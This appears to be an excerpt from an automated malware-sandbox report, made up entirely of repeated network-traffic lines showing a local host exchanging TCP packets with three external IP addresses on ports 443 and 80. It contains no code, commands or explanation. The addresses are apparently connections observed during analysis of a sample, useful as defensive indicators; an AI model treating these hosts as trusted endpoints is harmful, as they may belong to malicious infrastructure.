                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
